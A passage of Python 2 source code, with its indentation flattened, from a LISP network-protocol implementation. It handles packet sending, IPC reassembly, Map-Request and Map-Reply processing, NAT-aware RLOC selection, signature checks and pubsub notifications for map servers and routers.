lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
len(packet), bold("to " + address, False), port,
lisp_format_packet(packet)))
#
# If Map-Request/Reply RLOC-probe set TTL for outgoing packet to 255.
#
set_ttl = (LISP_RLOC_PROBE_TTL == 255)
if (set_ttl):
lisp_type = struct.unpack("B", packet[0])[0]
set_ttl = (lisp_type in [0x12, 0x28])
if (set_ttl): lisp_set_ttl(lisp_socket, LISP_RLOC_PROBE_TTL)
#endif
try: lisp_socket.sendto(packet, (address, port))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#
# Set back to default TTL.
#
if (set_ttl): lisp_set_ttl(lisp_socket, 64)
return
#enddef
#
# lisp_receive_segments
#
# Process 1500 byte segments if received IPC packet greater than what sockets
# can support.
#
def lisp_receive_segments(lisp_socket, packet, source, total_length):
#
# If the total length is equal to the segment length. We only have one
# segment which is the packet. Return it.
#
segment_len = total_length - len(packet)
if (segment_len == 0): return([True, packet])
lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
total_length, source))
#
# Otherwise, receive each segment and assemble it to return entire packet
# to caller.
#
length = segment_len
while (length > 0):
try: segment = lisp_socket.recvfrom(9000)
except: return([False, None])
segment = segment[0]
#
# The sender gave up and sent a new message that made it to us, last
# partial packet must be dropped.
#
if (segment.find("packet@") == 0):
seg = segment.split("@")
lprint("Received new message ({}-out-of-{}) while receiving " + \
"fragments, old message discarded", len(segment),
seg[1] if len(seg) > 2 else "?")
return([False, segment])
#endif
length -= len(segment)
packet += segment
lprint("Received {}-out-of-{} byte segment from {}".format( \
len(segment), total_length, source))
#endwhile
return([True, packet])
#enddef
#
# lisp_bit_stuff
#
# For every element in the array, insert a 0x40 ("@"). This is a bit-stuffing
# procedure. Only look array elemsnts with index 2 and above.
#
def lisp_bit_stuff(payload):
lprint("Bit-stuffing, found {} segments".format(len(payload)))
packet = ""
for segment in payload: packet += segment + "\x40"
return(packet[:-1])
#enddef
#
# lisp_receive
#
# Wait for packet to come in. This function call will block. For command
# IPCs, we need to loop to assemble all segments.
#
# For an internal socket, the format of a recvfrom() 'packet-data' is:
#
# "command" @ <total-length> @ <source> @ <packet-buffer>
# "packet" @ <total-length> @ <source> @ <command-buffer>
#
# So when an array of length 4 does not exist, we are receiving a fragment.
#
# For an external network socket, the format of a recvfrom() is:
#
# packet_data[0] = <packet-buffer>
# packet_data[1] = [<source>, <port>]
#
def lisp_receive(lisp_socket, internal):
while (True):
#
# Read from socket. Return if we received an error.
#
try: packet_data = lisp_socket.recvfrom(9000)
except: return(["", "", "", ""])
#
# This is a packet received on the network. If it was fragmented at the
# sender, then IP did it so it is assebled into a complete datagram
# in this sytem.
#
if (internal == False):
packet = packet_data[0]
source = lisp_convert_6to4(packet_data[1][0])
port = packet_data[1][1]
if (port == LISP_DATA_PORT):
do_log = lisp_data_plane_logging
packet_str = lisp_format_packet(packet[0:60]) + " ..."
else:
do_log = True
packet_str = lisp_format_packet(packet)
#endif
if (do_log):
lprint("{} {} bytes {} {}, packet: {}".format(bold("Receive",
False), len(packet), bold("from " + source, False), port,
packet_str))
#endif
return(["packet", source, port, packet])
#endif
#
# This is an IPC message that can be fragmented by lisp-core or the
# sending socket interface.
#
assembled = False
data = packet_data[0]
loop = False
while (assembled == False):
data = data.split("@")
if (len(data) < 4):
lprint("Possible fragment (length {}), from old message, " + \
"discarding", len(data[0]))
loop = True
break
#endif
opcode = data[0]
try:
total_length = int(data[1])
except:
error_str = bold("Internal packet reassembly error", False)
lprint("{}: {}".format(error_str, packet_data))
loop = True
break
#endtry
source = data[2]
port = data[3]
#
# If any of the data payload has a 0x40 byte (which is "@" in
# ascii), we will confuse the IPC separator from real data.
# So go to the payload and put in 0x40 where split() seperated
# the data. This particularly happens with Map-Notify messages
# since the first byte of the message is 0x40.
#
if (len(data) > 5):
packet = lisp_bit_stuff(data[4::])
else:
packet = data[4]
#endif
#
# Check for reassembly. Once reassembled, then we can process one
# large packet.
#
assembled, packet = lisp_receive_segments(lisp_socket, packet,
source, total_length)
if (packet == None): return(["", "", "", ""])
#
# We did not finish assembling a message but the sender sent a new
# one.
#
if (assembled == False):
data = packet
continue
#endif
if (port == ""): port = "no-port"
if (opcode == "command" and lisp_i_am_core == False):
index = packet.find(" {")
command = packet if index == -1 else packet[:index]
command = ": '" + command + "'"
else:
command = ""
#endif
lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
len(packet), bold("from " + source, False), port, opcode,
command if (opcode in ["command", "api"]) else ": ... " if \
(opcode == "data-packet") else \
": " + lisp_format_packet(packet)))
#endif
#endwhile
if (loop): continue
return([opcode, source, port, packet])
#endwhile
#enddef
#
# lisp_parse_packet
#
# Parse LISP control message.
#
def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
trigger_flag = False
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return(trigger_flag)
#endif
#
# Store source in internal lisp_address() format.
#
from_ipc = source
if (source.find("lisp") == -1):
s = lisp_address(LISP_AFI_NONE, "", 0, 0)
s.string_to_afi(source)
s.store_address(source)
source = s
#endif
if (header.type == LISP_MAP_REQUEST):
lisp_process_map_request(lisp_sockets, packet, None, 0, source,
udp_sport, False, ttl)
elif (header.type == LISP_MAP_REPLY):
lisp_process_map_reply(lisp_sockets, packet, source, ttl)
elif (header.type == LISP_MAP_REGISTER):
lisp_process_map_register(lisp_sockets, packet, source, udp_sport)
elif (header.type == LISP_MAP_NOTIFY):
if (from_ipc == "lisp-etr"):
lisp_process_multicast_map_notify(packet, source)
else:
if (lisp_is_running("lisp-rtr")):
lisp_process_multicast_map_notify(packet, source)
#endif
lisp_process_map_notify(lisp_sockets, packet, source)
#endif
elif (header.type == LISP_MAP_NOTIFY_ACK):
lisp_process_map_notify_ack(packet, source)
elif (header.type == LISP_MAP_REFERRAL):
lisp_process_map_referral(lisp_sockets, packet, source)
elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
x, y, trigger_flag = lisp_process_info_reply(source, packet, True)
elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
addr_str = source.print_address_no_iid()
lisp_process_info_request(lisp_sockets, packet, addr_str, udp_sport,
None)
elif (header.type == LISP_ECM):
lisp_process_ecm(lisp_sockets, packet, source, udp_sport)
else:
lprint("Invalid LISP control packet type {}".format(header.type))
#endif
return(trigger_flag)
#enddef
#
# lisp_process_rloc_probe_request
#
# Process Map-Request with RLOC-probe bit set.
#
def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
ttl):
p = bold("RLOC-probe", False)
if (lisp_i_am_etr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
ttl)
return
#endif
if (lisp_i_am_rtr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
ttl)
return
#endif
lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(p))
return
#enddef
#
# lisp_process_smr
#
def lisp_process_smr(map_request):
lprint("Received SMR-based Map-Request")
return
#enddef
#
# lisp_process_smr_invoked_request
#
def lisp_process_smr_invoked_request(map_request):
lprint("Received SMR-invoked Map-Request")
return
#enddef
#
# lisp_build_map_reply
#
# Build a Map-Reply and return a packet to the caller.
#
def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl, rloc_probe,
keys, enc, auth, mr_ttl=-1):
map_reply = lisp_map_reply()
map_reply.rloc_probe = rloc_probe
map_reply.echo_nonce_capable = enc
map_reply.hop_count = 0 if (mr_ttl == -1) else mr_ttl
map_reply.record_count = 1
map_reply.nonce = nonce
packet = map_reply.encode()
map_reply.print_map_reply()
eid_record = lisp_eid_record()
eid_record.rloc_count = len(rloc_set)
eid_record.authoritative = auth
eid_record.record_ttl = ttl
eid_record.action = action
eid_record.eid = eid
eid_record.group = group
packet += eid_record.encode()
eid_record.print_record(" ", False)
local_rlocs = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()
for rloc_entry in rloc_set:
rloc_record = lisp_rloc_record()
addr_str = rloc_entry.rloc.print_address_no_iid()
if (addr_str in local_rlocs):
rloc_record.local_bit = True
rloc_record.probe_bit = rloc_probe
rloc_record.keys = keys
if (rloc_entry.priority == 254 and lisp_i_am_rtr):
rloc_record.rloc_name = "RTR"
#endif
#endif
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.reach_bit = True
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endfor
return(packet)
#enddef
#
# lisp_build_map_referral
#
# Build a Map-Referral and return a packet to the caller.
#
def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
eid_record = lisp_eid_record()
rloc_count = 0
if (ddt_entry == None):
eid_record.eid = eid
eid_record.group = group
else:
rloc_count = len(ddt_entry.delegation_set)
eid_record.eid = ddt_entry.eid
eid_record.group = ddt_entry.group
ddt_entry.map_referrals_sent += 1
#endif
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
#
# Use action passed into this function. But if NULL, select the action
# based on the first ddt-node child type.
#
incomplete = False
if (action == LISP_DDT_ACTION_NULL):
if (rloc_count == 0):
action = LISP_DDT_ACTION_NODE_REFERRAL
else:
ddt_node = ddt_entry.delegation_set[0]
if (ddt_node.is_ddt_child()):
action = LISP_DDT_ACTION_NODE_REFERRAL
#endif
if (ddt_node.is_ms_child()):
action = LISP_DDT_ACTION_MS_REFERRAL
#endif
#endif
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (lisp_i_am_ms and ddt_node.is_ms_peer() == False)
#endif
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
if (rloc_count == 0): return(packet)
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
return(packet)
#enddef
#
# lisp_etr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
ttl):
if (map_request.target_group.is_null()):
db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
else:
db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
if (db): db = db.lookup_source_cache(map_request.target_eid, False)
#endif
eid_str = map_request.print_prefix()
if (db == None):
lprint("Database-mapping entry not found for requested EID {}". \
format(green(eid_str, False)))
return
#endif
prefix_str = db.print_eid_tuple()
lprint("Found database-mapping EID-prefix {} for requested EID {}". \
format(green(prefix_str, False), green(eid_str, False)))
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address() and lisp_nat_traversal):
itr_rloc = source
#endif
nonce = map_request.nonce
enc = lisp_nonce_echoing
keys = map_request.keys
db.map_replies_sent += 1
packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
LISP_NO_ACTION, 1440, map_request.rloc_probe, keys, enc, True, ttl)
#
# If we are sending a RLOC-probe Map-Reply to an RTR, data encapsulate it.
# If we are getting RLOC-probe Map-Requests from an xTR behind a NAT, and
# we are an ETR not behind a NAT, we want return the RLOC-probe Map-Reply
# to the swapped control ports.
#
# We could be getting a RLOC-probe from an xTR that is behind the same
# NAT as us. So do not data encapsulate the RLOC-probe reply.
#
# There is a special hack here. If the sport is 0, this RLOC-probe
# request is coming from an RTR. If we are doing gleaning on the RTR,
# this xTR needs to data encapsulate the RLOC-probe reply. The lisp_rtr_
# list will not be set because a gleaned xTR does not have NAT-traversal
# enabled.
#
if (map_request.rloc_probe and len(lisp_sockets) == 4):
public = (itr_rloc.is_private_address() == False)
rtr = itr_rloc.print_address_no_iid()
if ((public and lisp_rtr_list.has_key(rtr)) or sport == 0):
lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
return
#endif
#endif
#
# Send to lisp-core process to send packet from UDP port 4342.
#
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_rtr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
ttl):
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address()): itr_rloc = source
nonce = map_request.nonce
eid = map_request.target_eid
group = map_request.target_group
rloc_set = []
for myrloc in [lisp_myrlocs[0], lisp_myrlocs[1]]:
if (myrloc == None): continue
rloc = lisp_rloc()
rloc.rloc.copy_address(myrloc)
rloc.priority = 254
rloc_set.append(rloc)
#endfor
enc = lisp_nonce_echoing
keys = map_request.keys
packet = lisp_build_map_reply(eid, group, rloc_set, nonce, LISP_NO_ACTION,
1440, True, keys, enc, True, ttl)
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_get_private_rloc_set
#
# If the source-EID and target-EID of a Map-Request are behind the same NAT,
# that is, have the same global RLOC address, then return just the private
# addresses in the Map-Reply so the xTRs have shortest RLOC paths between
# each other and don't have to hair-pin through the NAT/firewall device.
#
def lisp_get_private_rloc_set(target_site_eid, seid, group):
rloc_set = target_site_eid.registered_rlocs
source_site_eid = lisp_site_eid_lookup(seid, group, False)
if (source_site_eid == None): return(rloc_set)
#
# Get global RLOC address from target site.
#
target_rloc = None
new_set = []
for rloc_entry in rloc_set:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()):
new_rloc = copy.deepcopy(rloc_entry)
new_set.append(new_rloc)
continue
#endif
target_rloc = rloc_entry
break
#endfor
if (target_rloc == None): return(rloc_set)
target_rloc = target_rloc.rloc.print_address_no_iid()
#
# Get global RLOC address from source site.
#
source_rloc = None
for rloc_entry in source_site_eid.registered_rlocs:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()): continue
source_rloc = rloc_entry
break
#endfor
if (source_rloc == None): return(rloc_set)
source_rloc = source_rloc.rloc.print_address_no_iid()
#
# If the xTRs are behind the same NAT, then we return private addresses.
#
site_id = target_site_eid.site_id
if (site_id == 0):
if (source_rloc == target_rloc):
lprint("Return private RLOCs for sites behind {}".format( \
target_rloc))
return(new_set)
#endif
return(rloc_set)
#endif
#
# If the xTRs are not behind the same NAT, but are configured in the
# same site-id, they can reach each other with private addresses. So
# return them in the RLOC-set.
#
if (site_id == source_site_eid.site_id):
lprint("Return private RLOCs for sites in site-id {}".format(site_id))
return(new_set)
#endif
return(rloc_set)
#enddef
#
# lisp_get_partial_rloc_set
#
# If the Map-Request source is found in the RLOC-set, return all RLOCs that
# do not have the same priority as the Map-Request source (an RTR supporting
# NAT-traversal) RLOC. Otherwise, return all RLOCs that are not priority 254.
#
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
rtr_list = []
rloc_set = []
#
# Search the RTR list to see if the Map-Requestor is an RTR. If so,
# return the RLOC-set to the RTR so it can replicate directly to ETRs.
# Otherwise, return the RTR-list locator-set to the requesting ITR/PITR.
#
rtr_is_requestor = False
behind_nat = False
for rloc_entry in registered_rloc_set:
if (rloc_entry.priority != 254): continue
behind_nat |= True
if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
rtr_is_requestor = True
break
#endfor
#
# If we find an RTR in the RLOC-set, then the site's RLOC-set is behind
# a NAT. Otherwise, do not return a partial RLOC-set. This RLOC-set is in
# public space.
#
if (behind_nat == False): return(registered_rloc_set)
#
# An RTR can be behind a NAT when deployed in a cloud infrastructure.
# When the MS is in the same cloud infrastructure, the source address
# of the Map-Request (ECM) is not translated. So we are forced to put
# the private address in the rtr-list the MS advertises. But we should
# not return the private address in any Map-Replies. We use the private
# address in the rtr-list for the sole purpose to identify the RTR so
# we can return the RLOC-set of the ETRs.
#
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
#
# Create two small lists. A list of RTRs which are unicast priority of
# 254 and a rloc-set which are records that are not priority 254.
#
for rloc_entry in registered_rloc_set:
if (ignore_private and rloc_entry.rloc.is_private_address()): continue
if (multicast == False and rloc_entry.priority == 255): continue
if (multicast and rloc_entry.mpriority == 255): continue
if (rloc_entry.priority == 254):
rtr_list.append(rloc_entry)
else:
rloc_set.append(rloc_entry)
#endif
#endif
#
# The RTR is sending the Map-Request.
#
if (rtr_is_requestor): return(rloc_set)
#
# An ITR is sending the Map-Request.
#
# Chcek the case where an ETR included a local RLOC and may be behind
# the same NAT as the requester. In this case, the requester can encap
# directly the private RLOC. If it is not reachable, the ITR can encap
# to the RTR. The ITR will cache a subset of the RLOC-set in this entry
# (so it can check the global RLOC first and not encap to itself).
#
rloc_set = []
for rloc_entry in registered_rloc_set:
if (rloc_entry.rloc.is_private_address()): rloc_set.append(rloc_entry)
#endfor
rloc_set += rtr_list
return(rloc_set)
#enddef
#
# lisp_store_pubsub_state
#
# Take information from Map-Request to create a pubsub cache. We remember
# the map-server lookup EID-prefix. So when the RLOC-set changes for this
# EID-prefix, we trigger a Map-Notify messate to the ITR's RLOC and port
# number.
#
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl, xtr_id):
pubsub = lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id)
pubsub.add(reply_eid)
return
#enddef
#
# lisp_convert_reply_to_notify
#
# In lisp_ms_process_map_request(), a proxy map-reply is built to return to
# a requesting ITR. If the requesting ITR set the N-bit in the Map-Request,
# a subscription request is being requested, return a Map-Notify so it knows
# it has been acked.
#
# This function takes a fully built Map-Reply, changes the first 4 bytes to
# make the message a Map-Notify and inserts 4-bytes of Key-ID, Alg-ID, and
# Authentication Length of 0. Then we have converted the Map-Reply into a
# Map-Notify.
#
def lisp_convert_reply_to_notify(packet):
#
# Get data we need from Map-Reply for Map-Notify.
#
record_count = struct.unpack("I", packet[0:4])[0]
record_count = socket.ntohl(record_count) & 0xff
nonce = packet[4:12]
packet = packet[12::]
#
# Build Map-Notify header.
#
first_long = (LISP_MAP_NOTIFY << 28) | record_count
header = struct.pack("I", socket.htonl(first_long))
auth = struct.pack("I", 0)
#
# Concat fields of Map-Notify.
#
packet = header + nonce + auth + packet
return(packet)
#enddef
#
# lisp_notify_subscribers
#
# There has been an RLOC-set change, inform all subscribers who have subscribed
# to this EID-prefix.
#
def lisp_notify_subscribers(lisp_sockets, eid_record, eid, site):
eid_str = eid.print_prefix()
if (lisp_pubsub_cache.has_key(eid_str) == False): return
for pubsub in lisp_pubsub_cache[eid_str].values():
itr = pubsub.itr
port = pubsub.port
itr_str = red(itr.print_address_no_iid(), False)
sub_str = bold("subscriber", False)
xtr_id = "0x" + lisp_hex_string(pubsub.xtr_id)
nonce = "0x" + lisp_hex_string(pubsub.nonce)
lprint(" Notify {} {}:{} xtr-id {} for {}, nonce {}".format( \
sub_str, itr_str, port, xtr_id, green(eid_str, False), nonce))
lisp_build_map_notify(lisp_sockets, eid_record, [eid_str], 1, itr,
port, pubsub.nonce, 0, 0, 0, site, False)
pubsub.map_notify_count += 1
#endfor
return
#enddef
#
# lisp_process_pubsub
#
# Take a fully built Map-Reply and send a Map-Notify as a pubsub ack.
#
def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port, nonce,
ttl, xtr_id):
#
# Store subscriber state.
#
lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl, xtr_id)
eid = green(reply_eid.print_prefix(), False)
itr = red(itr_rloc.print_address_no_iid(), False)
mn = bold("Map-Notify", False)
xtr_id = "0x" + lisp_hex_string(xtr_id)
lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(mn,
eid, itr, xtr_id))
#
# Convert Map-Reply to Map-Notify header and send out.
#
packet = lisp_convert_reply_to_notify(packet)
lisp_send_map_notify(lisp_sockets, packet, itr_rloc, port)
return
#enddef
#
# lisp_ms_process_map_request
#
# Do Map-Server processing of a Map-Request. Returns various LISP-DDT internal
# and external action values.
#
def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
mr_sport, ecm_source):
#
# Look up EID in site cache. If we find it and it has registered for
# proxy-replying, this map-server will send the Map-Reply. Otherwise,
# send to one of the ETRs at the registered site.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
itr_rloc = map_request.itr_rlocs[0]
xtr_id = map_request.xtr_id
nonce = map_request.nonce
action = LISP_NO_ACTION
pubsub = map_request.subscribe_bit
#
# Check if we are verifying Map-Request signatures. If so, do a mapping
# database lookup on the source-EID to get public-key.
#
sig_good = True
is_crypto_hash = (lisp_get_eid_hash(eid) != None)
if (is_crypto_hash):
sig = map_request.map_request_signature
if (sig == None):
sig_good = False
lprint(("EID-crypto-hash signature verification {}, " + \
"no signature found").format(bold("failed", False)))
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("EID-crypto-hash signature verification {}".format(pf))
#endif
#endif
if (pubsub and sig_good == False):
pubsub = False
lprint("Suppress creating pubsub state due to signature failure")
#endif
#
# There are two cases here that need attention. If the Map-Request was
# an IPv6 Map-Request but the ECM came to us in a IPv4 packet, we need
# to return the Map-Reply in IPv4. And if the Map-Request came to us
# through a NAT, sending the Map-Reply to the Map-Request port won't
# get translated by the NAT. So we have to return the Map-Reply to the
# ECM port. Hopefully, the RTR is listening on the ECM port and using
# the Map-Request port as the ECM port as well. This is typically only
# a problem on the RTR, when behind a NAT. For an ITR, it usaully
# doesn't send Map-Requests since NAT-traversal logic installs default
# map-cache entries.
#
reply_dest = itr_rloc if (itr_rloc.afi == ecm_source.afi) else ecm_source
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None or site_eid.is_star_g()):
notfound = bold("Site not found", False)
lprint("{} for requested EID {}".format(notfound,
green(eid_str, False)))
#
# Send negative Map-Reply with TTL 15 minutes.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, 15, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_SITE_NOT_FOUND])
#endif
prefix_str = site_eid.print_eid_tuple()
site_name = site_eid.site.site_name
#
# If we are requesting for non Crypto-EIDs and signatures are configured
# to be requred and no signature is in the Map-Request, bail.
#
if (is_crypto_hash == False and site_eid.require_signature):
sig = map_request.map_request_signature
sig_eid = map_request.signature_eid
if (sig == None or sig_eid.is_null()):
lprint("Signature required for site {}".format(site_name))
sig_good = False
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("Required signature verification {}".format(pf))
#endif
#endif
#
# Check if site-eid is registered.
#
if (sig_good and site_eid.registered == False):
lprint("Site '{}' with EID-prefix {} is not registered for EID {}". \
format(site_name, green(prefix_str, False), green(eid_str, False)))
#
# We do not to return a coarser EID-prefix to the Map-Resolver. The
# AMS site entry may be one.
#
if (site_eid.accept_more_specifics == False):
eid = site_eid.eid
group = site_eid.group
#endif
#
# Send forced-TTLs even for native-forward entries.
#
ttl = 1
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Send negative Map-Reply with TTL 1 minute.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, ttl, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_MS_NOT_REG])
#endif
#
# Should we proxy-reply?
#
nat = False
pr_str = ""
check_policy = False
if (site_eid.force_nat_proxy_reply):
pr_str = ", nat-forced"
nat = True
check_policy = True
elif (site_eid.force_proxy_reply):
pr_str = ", forced"
check_policy = True
elif (site_eid.proxy_reply_requested):
pr_str = ", requested"
check_policy = True
elif (map_request.pitr_bit and site_eid.pitr_proxy_reply_drop):
pr_str = ", drop-to-pitr"
action = LISP_DROP_ACTION
elif (site_eid.proxy_reply_action != ""):
action = site_eid.proxy_reply_action
pr_str = ", forced, action {}".format(action)
action = LISP_DROP_ACTION if (action == "drop") else \
LISP_NATIVE_FORWARD_ACTION
#endif
#
# Apply policy to determine if we send a negative map-reply with action
# "policy-denied" or we send a map-reply with the policy set parameters.
#
policy_drop = False
policy = None
if (check_policy and lisp_policies.has_key(site_eid.policy)):
p = lisp_policies[site_eid.policy]
if (p.match_policy_map_request(map_request, mr_source)): policy = p
if (policy):
ps = bold("matched", False)
lprint("Map-Request {} policy '{}', set-action '{}'".format(ps,
p.policy_name, p.set_action))
else:
ps = bold("no match", False)
lprint("Map-Request {} for policy '{}', implied drop".format(ps,
p.policy_name))
policy_drop = True
#endif
#endif
if (pr_str != ""):
lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}". \
format(green(eid_str, False), site_name, green(prefix_str, False),
pr_str))
rloc_set = site_eid.registered_rlocs
ttl = 1440
if (nat):
if (site_eid.site_id != 0):
seid = map_request.source_eid
rloc_set = lisp_get_private_rloc_set(site_eid, seid, group)
#endif
if (rloc_set == site_eid.registered_rlocs):
m = (site_eid.group.is_null() == False)
new_set = lisp_get_partial_rloc_set(rloc_set, reply_dest, m)
if (new_set != rloc_set):
ttl = 15
rloc_set = new_set
#endif
#endif
#endif
#
# Force TTL if configured. To denote seconds in TTL field of EID-record
# set high-order bit in ttl value.
#
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Does policy say what the ttl should be? And if we should drop the
# Map-Request and return a negative Map-Reply
#
if (policy):
if (policy.set_record_ttl):
ttl = policy.set_record_ttl
lprint("Policy set-record-ttl to {}".format(ttl))
#endif
if (policy.set_action == "drop"):
lprint("Policy set-action drop, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
else:
rloc = policy.set_policy_map_reply()
if (rloc): rloc_set = [rloc]
#endif
#endif
if (policy_drop):
lprint("Implied drop action, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
#endif
enc = site_eid.echo_nonce_capable
#
# Don't tell spoofer any prefix information about the target EID.
#
if (sig_good):
reply_eid = site_eid.eid
reply_group = site_eid.group
else:
reply_eid = eid
reply_group = group
action = LISP_AUTH_FAILURE_ACTION
rloc_set = []
#endif
#
# If this Map-Request is also a subscription request, return same
# information in a Map-Notify.
#
packet = lisp_build_map_reply(reply_eid, reply_group, rloc_set,
nonce, action, ttl, False, None, enc, False)
if (pubsub):
lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc,
mr_sport, nonce, ttl, xtr_id)
else:
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, mr_sport)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# If there are no registered RLOCs, return.
#
rloc_count = len(site_eid.registered_rlocs)
if (rloc_count == 0):
lprint("Requested EID {} found site '{}' with EID-prefix {} with " + \
"no registered RLOCs".format(green(eid_str, False), site_name,
green(prefix_str, False)))
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# Forward to ETR at registered site. We have to put in an ECM.
#
hash_address = map_request.target_eid if map_request.source_eid.is_null() \
else map_request.source_eid
hashval = map_request.target_eid.hash_address(hash_address)
hashval %= rloc_count
etr = site_eid.registered_rlocs[hashval]
if (etr.rloc.is_null()):
lprint(("Suppress forwarding Map-Request for EID {} at site '{}' " + \
"EID-prefix {}, no RLOC address").format(green(eid_str, False),
site_name, green(prefix_str, False)))
else:
lprint(("Forwarding Map-Request for EID {} to ETR {} at site '{}' " + \
"EID-prefix {}").format(green(eid_str, False),
red(etr.rloc.print_address(), False), site_name,
green(prefix_str, False)))
#
# Send ECM.
#
lisp_send_ecm(lisp_sockets, packet, map_request.source_eid, mr_sport,
map_request.target_eid, etr.rloc, to_etr=True)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#enddef
#
# lisp_ddt_process_map_request
#
# Do DDT-node processing of a Map-Request received from an Map-Resolver.
#
def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):
#
# Lookup target EID address in DDT cache.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
nonce = map_request.nonce
action = LISP_DDT_ACTION_NULL
#
# First check to see if EID is registered locally if we are a Map-Server.
# Otherwise, do DDT lookup.
#
ddt_entry = None
if (lisp_i_am_ms):
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None): return
if (site_eid.registered):
action = LISP_DDT_ACTION_MS_ACK
ttl = 1440
else:
eid, group, action = lisp_ms_compute_neg_prefix(eid, group)
action = LISP_DDT_ACTION_MS_NOT_REG
ttl = 1
#endif
else:
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry == None):
action = LISP_DDT_ACTION_NOT_AUTH
ttl = 0
lprint("DDT delegation entry not found for EID {}".format( \
green(eid_str, False)))
elif (ddt_entry.is_auth_prefix()):
#
